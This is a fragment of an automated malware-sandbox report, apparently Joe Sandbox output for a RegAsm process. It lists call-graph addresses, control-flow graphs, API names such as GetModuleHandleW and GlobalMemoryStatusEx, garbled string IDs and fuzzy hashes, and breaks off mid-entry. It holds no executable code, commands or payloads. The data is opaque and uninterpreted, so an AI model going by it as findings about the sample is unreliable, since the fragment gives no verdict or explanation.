32497->32512 32498 59502c2 32498->32483 32501 59502ac 32500->32501 32503 59502f8 2 API calls 32501->32503 32502 59502c2 32502->32483 32503->32502 32505 59515cc 32504->32505 32506 59516b2 32505->32506 32524 59523b0 32505->32524 32510 59515d9 32508->32510 32509 59516b2 32509->32509 32510->32509 32511 59523b0 2 API calls 32510->32511 32511->32509 32513 59502fd 32512->32513 32514 595033c 32513->32514 32519 59502f8 GetModuleHandleW 32513->32519 32520 59504f8 32513->32520 32514->32498 32515 5950324 32515->32514 32516 5950540 GetModuleHandleW 32515->32516 32517 595056d 32516->32517 32517->32498 32519->32515 32521 59504f9 GetModuleHandleW 32520->32521 32523 595056d 32521->32523 32523->32515 32525 59523dc 32524->32525 32525->32506 32526 59524b2 32525->32526 32527 59524fe CreateWindowExW 32525->32527 32532 59523b0 CreateWindowExW 32526->32532 32533 5952510 32526->32533 32530 5952634 32527->32530 32528 59524f5 32528->32506 32530->32530 32532->32528 32534 5952578 CreateWindowExW 32533->32534 32536 5952634 32534->32536 32536->32536 32537 14a2290 32538 14a2294 32537->32538 32542 5958220 32538->32542 32546 5958108 32538->32546 32550 5958118 32538->32550 32543 59581f7 32542->32543 32544 595821e 32543->32544 32554 595829f 32543->32554 32544->32538 32548 5958110 32546->32548 32547 595821e 32547->32538 32548->32547 32549 595829f GlobalMemoryStatusEx 32548->32549 32549->32548 32551 5958144 32550->32551 32552 595821e 32551->32552 32553 595829f GlobalMemoryStatusEx 32551->32553 32552->32538 32553->32551 32556 59582a4 32554->32556 32555 5958266 32555->32543 32556->32555 32562 5958b20 32556->32562 32566 59588c0 32556->32566 32571 5958b11 32556->32571 32575 59588b3 32556->32575 32557 59583b6 32557->32557 32563 5958b21 32562->32563 32580 595e090 32563->32580 32564 5958d92 32564->32557 32568 59588d8 32566->32568 32567 595896e 32567->32557 32568->32567 32570 595e090 GlobalMemoryStatusEx 32568->32570 32569 5958d92 32569->32557 32570->32569 32572 5958b1c 32571->32572 32574 595e090 GlobalMemoryStatusEx 32572->32574 32573 5958d92 32573->32557 32574->32573 32577 59588d8 32575->32577 32576 595896e 32576->32557 32577->32576 32579 595e090 GlobalMemoryStatusEx 32577->32579 32578 5958d92 32578->32557 32579->32578 32581 595e094 32580->32581 32585 595e338 32581->32585 32591 595e348 32581->32591 32582 595e127 32582->32564 32586 595e33c 32585->32586 32586->32582 32587 595e324 32586->32587 32596 595e380 32586->32596 32601 595e37b 32586->32601 32587->32582 32588 595e356 32588->32582 32592 595e349 32591->32592 32594 595e380 GlobalMemoryStatusEx 32592->32594 32595 595e37b GlobalMemoryStatusEx 32592->32595 32593 595e356 32593->32582 32594->32593 32595->32593 32597 595e38d 32596->32597 32598 595e3b5 32596->32598 32597->32588 32606 595dcf8 32598->32606 32602 595e380 32601->32602 32603 595e38d 32602->32603 32604 595dcf8 GlobalMemoryStatusEx 32602->32604 32603->32588 32605 595e3d2 32604->32605 32605->32588 32607 595e458 GlobalMemoryStatusEx 32606->32607 32609 595e3d2 32607->32609 32609->32588 32682 14a73b0 32683 14a73f6 GetCurrentProcess 32682->32683 32685 14a7448 GetCurrentThread 32683->32685 32686 14a7441 32683->32686 32687 14a747e 32685->32687 32688 14a7485 GetCurrentProcess 32685->32688 32686->32685 32687->32688 32691 14a74bb 32688->32691 32689 14a74e3 GetCurrentThreadId 32690 14a7514 32689->32690 32691->32689

                                                              Executed Functions

                                                              Function 067F2448 Relevance: 12.2, Strings: 9, Instructions: 905COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                              • API String ID: 0-99275883
                                                              • Opcode ID: ab4c173a4eae7fad4e667a199218366928ea6c283e26bb38c8d3befaebe07bb5
                                                              • Instruction ID: 65d293d995bff7ac48962d4ef241fefff2e8db25e6e3db9391c36b3a7cb6b833
                                                              • Opcode Fuzzy Hash: ab4c173a4eae7fad4e667a199218366928ea6c283e26bb38c8d3befaebe07bb5
                                                              • Instruction Fuzzy Hash: 50822A34A20209DFCB94CFA8C584EAEBBF2FF48310F158559E5159B3A6D734EA41CB54
                                                              Function 067F1578 Relevance: 11.0, Strings: 8, Instructions: 1040COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (o]q$(o]q$(o]q$,aq$,aq$Haq$\;]q$\;]q
                                                              • API String ID: 0-2494306592
                                                              • Opcode ID: ce5c524f0094ed2fb320b76af15030dd87bfe32bbcd534b8092c15fc0f1e1f42
                                                              • Instruction ID: 7a52fdee03e6777d74fd79082beeb3029d920757e9a22821bde0594fde3d3b60
                                                              • Opcode Fuzzy Hash: ce5c524f0094ed2fb320b76af15030dd87bfe32bbcd534b8092c15fc0f1e1f42
                                                              • Instruction Fuzzy Hash: DD929D70A20209CFDB54CFA9C894AAEBBF6BF88300F558569E515DB3A1DB31DD41CB90
                                                              Function 067F5948 Relevance: 2.1, Strings: 1, Instructions: 833COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1402 67f5948-67f5995 call 67f66c8 1407 67f599b-67f59af 1402->1407 1408 67f65c3-67f65e8 1402->1408 1411 67f59fc-67f5a0d 1407->1411 1412 67f59b1-67f59e8 1407->1412 1429 67f65ed-67f65f4 1408->1429 1416 67f5a0f-67f5a22 1411->1416 1417 67f5a27-67f5a38 1411->1417 1694 67f59ea call 595ee10 1412->1694 1695 67f59ea call 595ee00 1412->1695 1416->1429 1423 67f5a3a-67f5a62 1417->1423 1424 67f5a67-67f5a78 1417->1424 1423->1429 1432 67f5a8b-67f5a9c 1424->1432 1433 67f5a7a-67f5a86 1424->1433 1430 67f59ef-67f59f7 1430->1429 1438 67f5a9e-67f5aa4 1432->1438 1439 67f5ad9-67f5aea 1432->1439 1433->1429 1438->1408 1441 67f5aaa-67f5ab0 1438->1441 1444 67f5aec-67f5af2 1439->1444 1445 67f5b23-67f5b34 1439->1445 1441->1408 1442 67f5ab6-67f5ad4 1441->1442 1442->1429 1444->1408 1447 67f5af8-67f5afe 1444->1447 1451 67f5b5f-67f5b70 1445->1451 1452 67f5b36-67f5b3c 1445->1452 1447->1408 1448 67f5b04-67f5b1e 1447->1448 1448->1429 1458 67f5c2a-67f5c3b 1451->1458 1459 67f5b76-67f5bc5 1451->1459 1452->1408 1454 67f5b42-67f5b5a 1452->1454 1454->1429 1465 67f5c3d-67f5c43 1458->1465 1466 67f5c59-67f5c6a 1458->1466 1459->1408 1487 67f5bcb-67f5bf7 call 67f55fc 1459->1487 1465->1408 1468 67f5c49-67f5c54 1465->1468 1472 67f5c6c-67f5c72 1466->1472 1473 67f5c8b-67f5c9c 1466->1473 1468->1429 1472->1408 1475 67f5c78-67f5c86 1472->1475 1480 67f5c9e-67f5cb0 1473->1480 1481 67f5cb5-67f5cc6 1473->1481 1475->1429 1480->1429 1485 67f5cdf-67f5cf0 1481->1485 1486 67f5cc8-67f5cda 1481->1486 1491 67f5d09-67f5d1a 1485->1491 1492 67f5cf2-67f5d04 1485->1492 1486->1429 1487->1408 1504 67f5bfd-67f5c25 call 67f560c 1487->1504 1496 67f5d3c-67f5d4d 1491->1496 1497 67f5d1c-67f5d22 1491->1497 1492->1429 1505 67f5dda-67f5deb 1496->1505 1506 67f5d53-67f5dbf 1496->1506 1497->1408 1499 67f5d28-67f5d37 1497->1499 1499->1429 1504->1429 1511 67f5ded-67f5dfa 1505->1511 1512 67f5e15-67f5e26 1505->1512 1506->1408 1537 67f5dc5-67f5dd5 1506->1537 1511->1429 1518 67f5e2c-67f5e98 1512->1518 1519 67f5eb3-67f5ec4 1512->1519 1518->1408 1555 67f5e9e-67f5eae 1518->1555 1526 67f5eee-67f5eff 1519->1526 1527 67f5ec6-67f5ed3 1519->1527 1533 67f5f26-67f5f37 1526->1533 1534 67f5f01-67f5f21 1526->1534 1527->1429 1540 67f5f3d-67f5fed 1533->1540 1541 67f5ff2-67f6003 1533->1541 1534->1429 1537->1429 1540->1429 1549 67f613c-67f614d 1541->1549 1550 67f6009-67f600f 1541->1550 1559 67f615f-67f6170 1549->1559 1560 67f614f-67f615a 1549->1560 1552 67f6015-67f601b 1550->1552 1553 67f60a4-67f6137 1550->1553 1552->1553 1556 67f6021-67f609f 1552->1556 1553->1429 1555->1429 1556->1429 1568 67f61dd-67f61ee 1559->1568 1569 67f6172-67f6186 1559->1569 1560->1429 1579 67f6232-67f6243 1568->1579 1580 67f61f0-67f61f6 1568->1580 1569->1408 1578 67f618c-67f6197 1569->1578 1590 67f61bc-67f61d8 1578->1590 1591 67f6199-67f61b7 1578->1591 1588 67f6245-67f627d 1579->1588 1589 67f6282-67f6293 1579->1589 1580->1408 1581 67f61fc-67f620c 1580->1581 1581->1408 1595 67f6212-67f622d 1581->1595 1588->1429 1601 67f631a-67f632b 1589->1601 1602 67f6299-67f6315 1589->1602 1590->1429 1591->1429 1595->1429 1601->1429 1617 67f6331-67f6338 1601->1617 1602->1429 1621 67f635e-67f659b call 67f5628 call 67f5638 call 67f5648 call 67f5658 call 67f5668 call 67f5638 call 67f5648 call 67f5678 call 67f5688 1617->1621 1622 67f633a-67f634b call 67f561c 1617->1622 1621->1429 1622->1621 1694->1430 1695->1430
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te]q
                                                              • API String ID: 0-52440209
                                                              • Opcode ID: ede4bd47a441f47c978f24877b0c2feb4da14046b0fa4323dc8bdae3e7af7d82
                                                              • Instruction ID: fd619ddaa814e6c18900de30b3d9239e723b25c38cba85ba8bae7a9cae07b686
                                                              • Opcode Fuzzy Hash: ede4bd47a441f47c978f24877b0c2feb4da14046b0fa4323dc8bdae3e7af7d82
                                                              • Instruction Fuzzy Hash: 46628E34B102008FDB55AF75D968F2D77A7AFC8B10F108529E906AB395DF39DC828B91
                                                              Function 014A73A2 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 726 14a73a2-14a743f GetCurrentProcess 730 14a7448-14a747c GetCurrentThread 726->730 731 14a7441-14a7447 726->731 732 14a747e-14a7484 730->732 733 14a7485-14a74b9 GetCurrentProcess 730->733 731->730 732->733 734 14a74bb-14a74c1 733->734 735 14a74c2-14a74dd call 14a7580 733->735 734->735 739 14a74e3-14a7512 GetCurrentThreadId 735->739 740 14a751b-14a757d 739->740 741 14a7514-14a751a 739->741 741->740
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 014A742E
                                                              • GetCurrentThread.KERNEL32 ref: 014A746B
                                                              • GetCurrentProcess.KERNEL32 ref: 014A74A8
                                                              • GetCurrentThreadId.KERNEL32 ref: 014A7501
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3343068533.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_14a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 1965fbfd858ee2e52d74548bb422045abcaee23e64f2edd5f9cfd6c6be3e5613
                                                              • Instruction ID: c497093e4e2ebb506f570493ee4f2ce98f1f82d3c61dd5499b233ef06bdac63d
                                                              • Opcode Fuzzy Hash: 1965fbfd858ee2e52d74548bb422045abcaee23e64f2edd5f9cfd6c6be3e5613
                                                              • Instruction Fuzzy Hash: AD5148B09013498FDB18DFA9D548BAEBFF1FF88314F20846AD419A7360D7399944CB65
                                                              Function 014A73B0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 748 14a73b0-14a743f GetCurrentProcess 752 14a7448-14a747c GetCurrentThread 748->752 753 14a7441-14a7447 748->753 754 14a747e-14a7484 752->754 755 14a7485-14a74b9 GetCurrentProcess 752->755 753->752 754->755 756 14a74bb-14a74c1 755->756 757 14a74c2-14a74dd call 14a7580 755->757 756->757 761 14a74e3-14a7512 GetCurrentThreadId 757->761 762 14a751b-14a757d 761->762 763 14a7514-14a751a 761->763 763->762
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 014A742E
                                                              • GetCurrentThread.KERNEL32 ref: 014A746B
                                                              • GetCurrentProcess.KERNEL32 ref: 014A74A8
                                                              • GetCurrentThreadId.KERNEL32 ref: 014A7501
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3343068533.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_14a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: bec50d9a03f5c6683a1d17a44cb474db31111c267009d4a21af994e82edf19ee
                                                              • Instruction ID: a883ac0e11f3b2df477b083ed6baef4ece6e1fcc00c99d3248a1b534521b2c5b
                                                              • Opcode Fuzzy Hash: bec50d9a03f5c6683a1d17a44cb474db31111c267009d4a21af994e82edf19ee
                                                              • Instruction Fuzzy Hash: 735148B09002498FDB28DFA9D548BAEBFF5FF88314F208469D019A73A0D7399944CF65
                                                              Function 067F4118 Relevance: 4.2, Strings: 3, Instructions: 444COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 770 67f4118-67f4125 771 67f4127-67f412c 770->771 772 67f4131-67f413d 770->772 773 67f44c6-67f44cb 771->773 775 67f413f-67f414b 772->775 776 67f414d-67f4152 772->776 775->776 778 67f4157-67f4163 775->778 776->773 780 67f4165-67f4171 778->780 781 67f4173-67f4178 778->781 780->781 783 67f417d-67f4188 780->783 781->773 785 67f418e-67f4199 783->785 786 67f4232-67f423d 783->786 789 67f41af 785->789 790 67f419b-67f41ad 785->790 791 67f4243-67f4252 786->791 792 67f42e0-67f42ec 786->792 793 67f41b4-67f41b6 789->793 790->793 799 67f4254-67f425e 791->799 800 67f4263-67f4272 791->800 801 67f42ee-67f42fa 792->801 802 67f42fc-67f430e 792->802 795 67f41b8-67f41c7 793->795 796 67f41d6-67f41db 793->796 795->796 807 67f41c9-67f41d4 795->807 796->773 799->773 809 67f4296-67f429f 800->809 810 67f4274-67f4280 800->810 801->802 811 67f433c-67f4347 801->811 814 67f4332-67f4337 802->814 815 67f4310-67f431c 802->815 807->796 818 67f41e0-67f41e9 807->818 824 67f42b5 809->824 825 67f42a1-67f42b3 809->825 820 67f428c-67f4291 810->820 821 67f4282-67f4287 810->821 822 67f434d-67f4356 811->822 823 67f4429-67f4434 811->823 814->773 834 67f431e-67f4323 815->834 835 67f4328-67f432d 815->835 829 67f41eb-67f41f0 818->829 830 67f41f5-67f4204 818->830 820->773 821->773 839 67f436c 822->839 840 67f4358-67f436a 822->840 837 67f445e-67f446d 823->837 838 67f4436-67f4440 823->838 826 67f42ba-67f42bc 824->826 825->826 826->792 832 67f42be-67f42ca 826->832 829->773 846 67f4228-67f422d 830->846 847 67f4206-67f4212 830->847 850 67f42cc-67f42d1 832->850 851 67f42d6-67f42db 832->851 834->773 835->773 853 67f446f-67f447e 837->853 854 67f44c1 837->854 856 67f4457-67f445c 838->856 857 67f4442-67f444e 838->857 842 67f4371-67f4373 839->842 840->842 848 67f4375-67f4381 842->848 849 67f4383 842->849 846->773 863 67f421e-67f4223 847->863 864 67f4214-67f4219 847->864 855 67f4388-67f438a 848->855 849->855 850->773 851->773 853->854 866 67f4480-67f4498 853->866 854->773 860 67f438c-67f4391 855->860 861 67f4396-67f43a9 855->861 856->773 857->856 868 67f4450-67f4455 857->868 860->773 869 67f43ab 861->869 870 67f43e1-67f43eb 861->870 863->773 864->773 881 67f44ba-67f44bf 866->881 882 67f449a-67f44b8 866->882 868->773 872 67f43ae-67f43bf call 67f3f78 869->872 877 67f43ed-67f43f9 call 67f3f78 870->877 878 67f440a-67f4416 870->878 879 67f43c6-67f43cb 872->879 880 67f43c1-67f43c4 872->880 892 67f43fb-67f43fe 877->892 893 67f4400-67f4405 877->893 887 67f441f 878->887 888 67f4418-67f441d 878->888 879->773 880->879 884 67f43d0-67f43d3 880->884 881->773 882->773 889 67f44cc-67f44d8 884->889 890 67f43d9-67f43df 884->890 894 67f4424 887->894 888->894 897 67f44ec-67f4528 889->897 898 67f44da-67f44e7 889->898 890->870 890->872 892->878 892->893 893->773 894->773 902 67f453b-67f4546 897->902 903 67f452a-67f4535 897->903 898->897 906 67f454c-67f45a9 902->906 907 67f4617-67f4653 902->907 903->902 908 67f45be-67f4610 903->908 915 67f45b2-67f45bb 906->915 918 67f465a-67f465c 907->918 919 67f4655 call 67f2f88 907->919 908->907 921 67f465e-67f466b 918->921 922 67f466d-67f467b 918->922 919->918 928 67f468b-67f468e 921->928 926 67f467d-67f4687 922->926 927 67f4689 922->927 926->928 927->928
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (o]q$4']q$4']q
                                                              • API String ID: 0-2177113439
                                                              • Opcode ID: 6d739523e0545eff5d18df22670e2383f3c6c7269e6c1c78790f87ab3b5628de
                                                              • Instruction ID: 41e18bddc550f28d33dcd2d5c172f0477492ac852030081beb54aa7103e33733
                                                              • Opcode Fuzzy Hash: 6d739523e0545eff5d18df22670e2383f3c6c7269e6c1c78790f87ab3b5628de
                                                              • Instruction Fuzzy Hash: 78E161317201118FDB659F39C958F3E77E6EF84610F188469E606DB3AAEE29CC42C791
                                                              Function 067F3510 Relevance: 3.2, Strings: 2, Instructions: 701COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 932 67f3510-67f39fe 1007 67f3a04-67f3a14 932->1007 1008 67f3f50-67f3f85 932->1008 1007->1008 1009 67f3a1a-67f3a2a 1007->1009 1015 67f3f87-67f3f8c 1008->1015 1016 67f3f91-67f3faf 1008->1016 1009->1008 1010 67f3a30-67f3a40 1009->1010 1010->1008 1012 67f3a46-67f3a56 1010->1012 1012->1008 1014 67f3a5c-67f3a6c 1012->1014 1014->1008 1017 67f3a72-67f3a82 1014->1017 1018 67f4076-67f407b 1015->1018 1027 67f4026-67f4032 1016->1027 1028 67f3fb1-67f3fbb 1016->1028 1017->1008 1019 67f3a88-67f3a98 1017->1019 1019->1008 1021 67f3a9e-67f3aae 1019->1021 1021->1008 1022 67f3ab4-67f3ac4 1021->1022 1022->1008 1024 67f3aca-67f3ada 1022->1024 1024->1008 1025 67f3ae0-67f3f4f 1024->1025 1033 67f4049-67f4055 1027->1033 1034 67f4034-67f4040 1027->1034 1028->1027 1035 67f3fbd-67f3fc9 1028->1035 1044 67f406c-67f406e 1033->1044 1045 67f4057-67f4063 1033->1045 1034->1033 1043 67f4042-67f4047 1034->1043 1040 67f3fee-67f3ff1 1035->1040 1041 67f3fcb-67f3fd6 1035->1041 1046 67f4008-67f4014 1040->1046 1047 67f3ff3-67f3fff 1040->1047 1041->1040 1053 67f3fd8-67f3fe2 1041->1053 1043->1018 1044->1018 1045->1044 1055 67f4065-67f406a 1045->1055 1051 67f407c-67f40a0 1046->1051 1052 67f4016-67f401d 1046->1052 1047->1046 1059 67f4001-67f4006 1047->1059 1060 67f40ae 1051->1060 1061 67f40a7-67f40ac 1051->1061 1052->1051 1056 67f401f-67f4024 1052->1056 1053->1040 1063 67f3fe4-67f3fe9 1053->1063 1055->1018 1056->1018 1059->1018 1064 67f40b0-67f40b1 1060->1064 1061->1064 1063->1018
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $]q$$]q
                                                              • API String ID: 0-127220927
                                                              • Opcode ID: eb1bc72dab52ece11d9fb4c9570c10740d287d26395cb674348c1244cc4cc09c
                                                              • Instruction ID: 40a965e65ee519af1731ddea3bf109c4806931c38b099c1971683872abb7a344
                                                              • Opcode Fuzzy Hash: eb1bc72dab52ece11d9fb4c9570c10740d287d26395cb674348c1244cc4cc09c
                                                              • Instruction Fuzzy Hash: AF527074A002198FEB559FA4C960B9EBBB7FF94300F1080AED60A6B3A5CE395D45CF51
                                                              Function 067F0D20 Relevance: 2.8, Strings: 2, Instructions: 344COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1123 67f0d20-67f0d42 1126 67f0d58-67f0d63 1123->1126 1127 67f0d44-67f0d48 1123->1127 1130 67f0e0b-67f0e37 1126->1130 1131 67f0d69-67f0d6b 1126->1131 1128 67f0d4a-67f0d56 1127->1128 1129 67f0d70-67f0d77 1127->1129 1128->1126 1128->1129 1133 67f0d79-67f0d80 1129->1133 1134 67f0d97-67f0da0 1129->1134 1137 67f0e3e-67f0e96 1130->1137 1132 67f0e03-67f0e08 1131->1132 1133->1134 1135 67f0d82-67f0d8d 1133->1135 1244 67f0da2 call 67f0d20 1134->1244 1245 67f0da2 call 67f0d10 1134->1245 1135->1137 1138 67f0d93-67f0d95 1135->1138 1157 67f0e98-67f0e9e 1137->1157 1158 67f0ea5-67f0eb6 1137->1158 1138->1132 1139 67f0da8-67f0daa 1140 67f0dac-67f0db0 1139->1140 1141 67f0db2-67f0dba 1139->1141 1140->1141 1144 67f0dcd-67f0dde 1140->1144 1145 67f0dbc-67f0dc1 1141->1145 1146 67f0dc9-67f0dcb 1141->1146 1238 67f0de1 call 67f156b 1144->1238 1239 67f0de1 call 67f16f8 1144->1239 1240 67f0de1 call 67f16e8 1144->1240 1241 67f0de1 call 67f1578 1144->1241 1242 67f0de1 call 67f1573 1144->1242 1243 67f0de1 call 67f11d1 1144->1243 1145->1146 1146->1132 1148 67f0de7-67f0dec 1150 67f0dee-67f0df7 1148->1150 1151 67f0e01 1148->1151 1233 67f0df9 call 67f410b 1150->1233 1234 67f0df9 call 67f4118 1150->1234 1235 67f0df9 call 67f4595 1150->1235 1151->1132 1154 67f0dff 1154->1132 1157->1158 1160 67f0ebc-67f0ec0 1158->1160 1161 67f0f4a-67f0f4c 1158->1161 1162 67f0ec2-67f0ece 1160->1162 1163 67f0ed0-67f0edd 1160->1163 1236 67f0f4e call 67f0d20 1161->1236 1237 67f0f4e call 67f0d10 1161->1237 1171 67f0edf-67f0ee9 1162->1171 1163->1171 1164 67f0f54-67f0f5a 1165 67f0f5c-67f0f62 1164->1165 1166 67f0f66-67f0f6d 1164->1166 1169 67f0fc8-67f1027 1165->1169 1170 67f0f64 1165->1170 1183 67f102e-67f103a 1169->1183 1170->1166 1174 67f0eeb-67f0efa 1171->1174 1175 67f0f16-67f0f1a 1171->1175 1186 67f0efc-67f0f03 1174->1186 1187 67f0f0a-67f0f14 1174->1187 1176 67f0f1c-67f0f22 1175->1176 1177 67f0f26-67f0f2a 1175->1177 1179 67f0f24 1176->1179 1180 67f0f70-67f0fc1 1176->1180 1177->1166 1181 67f0f2c-67f0f30 1177->1181 1179->1166 1180->1169 1181->1183 1184 67f0f36-67f0f48 1181->1184 1194 67f103c-67f1040 1183->1194 1195 67f1041-67f1042 1183->1195 1184->1166 1186->1187 1187->1175 1194->1195 1196 67f1049-67f105e 1195->1196 1197 67f1043-67f1044 1195->1197 1209 67f1083-67f1090 1196->1209 1210 67f1060-67f1069 1196->1210 1201 67f106b-67f106d 1197->1201 1202 67f1046-67f1048 1197->1202 1203 67f107f-67f1081 1201->1203 1204 67f106f-67f107d 1201->1204 1202->1196 1207 67f1092-67f109c 1203->1207 1204->1207 1218 67f109e-67f10ac 1207->1218 1219 67f10c4 1207->1219 1209->1207 1210->1201 1223 67f10ae-67f10b2 1218->1223 1224 67f10b9-67f10c2 1218->1224 1246 67f10c6 call 67f11db 1219->1246 1247 67f10c6 call 67f11e0 1219->1247 1221 67f10cc-67f10d0 1226 67f10e9-67f10ed 1221->1226 1227 67f10d2-67f10e7 1221->1227 1223->1224 1224->1219 1228 67f10ef-67f1104 1226->1228 1229 67f110b-67f1111 1226->1229 1227->1229 1228->1229 1233->1154 1234->1154 1235->1154 1236->1164 1237->1164 1238->1148 1239->1148 1240->1148 1241->1148 1242->1148 1243->1148 1244->1139 1245->1139 1246->1221 1247->1221
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Haq$Haq
                                                              • API String ID: 0-4016896955
                                                              • Opcode ID: 92285da43c461faddcb1bff5c5cf5913a8d289552b4f9674348fe92c6e2a359d
                                                              • Instruction ID: f878f4540a8c324f1e1d0fc0185e1d1081f71e9ae830d60f57d6fdd649dcee04
                                                              • Opcode Fuzzy Hash: 92285da43c461faddcb1bff5c5cf5913a8d289552b4f9674348fe92c6e2a359d
                                                              • Instruction Fuzzy Hash: F8C1BD347202158FDB559F38C864A3A7BA6BF88650F148569E906CB396DF39DC02CBD1
                                                              Function 067F11E0 Relevance: 2.7, Strings: 2, Instructions: 199COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1248 67f11e0-67f11ed 1249 67f11ef-67f11f3 1248->1249 1250 67f11f5-67f11f7 1248->1250 1249->1250 1251 67f11fc-67f1207 1249->1251 1252 67f1408-67f140f 1250->1252 1253 67f120d-67f1214 1251->1253 1254 67f1410 1251->1254 1255 67f121a-67f1229 1253->1255 1256 67f13a9-67f13af 1253->1256 1259 67f1415-67f1429 1254->1259 1255->1259 1260 67f122f-67f123e 1255->1260 1257 67f13b5-67f13b9 1256->1257 1258 67f13b1-67f13b3 1256->1258 1261 67f13bb-67f13c1 1257->1261 1262 67f1406 1257->1262 1258->1252 1266 67f1253-67f1256 1260->1266 1267 67f1240-67f1243 1260->1267 1261->1254 1264 67f13c3-67f13c6 1261->1264 1262->1252 1264->1254 1268 67f13c8-67f13dd 1264->1268 1270 67f1262-67f1268 1266->1270 1271 67f1258-67f125b 1266->1271 1269 67f1245-67f1248 1267->1269 1267->1270 1282 67f13df-67f13e5 1268->1282 1283 67f1401-67f1404 1268->1283 1272 67f124e 1269->1272 1273 67f1349-67f134f 1269->1273 1277 67f126a-67f1270 1270->1277 1278 67f1280-67f129d 1270->1278 1274 67f12ae-67f12b4 1271->1274 1275 67f125d 1271->1275 1279 67f1374-67f1381 1272->1279 1286 67f1367-67f1371 1273->1286 1287 67f1351-67f1357 1273->1287 1280 67f12cc-67f12de 1274->1280 1281 67f12b6-67f12bc 1274->1281 1275->1279 1284 67f1274-67f127e 1277->1284 1285 67f1272 1277->1285 1311 67f12a6-67f12a9 1278->1311 1303 67f1395-67f1397 1279->1303 1304 67f1383-67f1387 1279->1304 1306 67f12ee-67f1311 1280->1306 1307 67f12e0-67f12ec 1280->1307 1288 67f12be 1281->1288 1289 67f12c0-67f12ca 1281->1289 1290 67f13f7-67f13fa 1282->1290 1291 67f13e7-67f13f5 1282->1291 1283->1252 1284->1278 1285->1278 1286->1279 1292 67f135b-67f1365 1287->1292 1293 67f1359 1287->1293 1288->1280 1289->1280 1290->1254 1297 67f13fc-67f13ff 1290->1297 1291->1254 1291->1290 1292->1286 1293->1286 1297->1282 1297->1283 1309 67f139b-67f139e 1303->1309 1304->1303 1308 67f1389-67f138d 1304->1308 1306->1254 1317 67f1317-67f131a 1306->1317 1315 67f1339-67f1347 1307->1315 1308->1254 1312 67f1393 1308->1312 1309->1254 1313 67f13a0-67f13a3 1309->1313 1311->1279 1312->1309 1313->1255 1313->1256 1315->1279 1317->1254 1319 67f1320-67f1332 1317->1319 1319->1315
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,aq$,aq
                                                              • API String ID: 0-2990736959
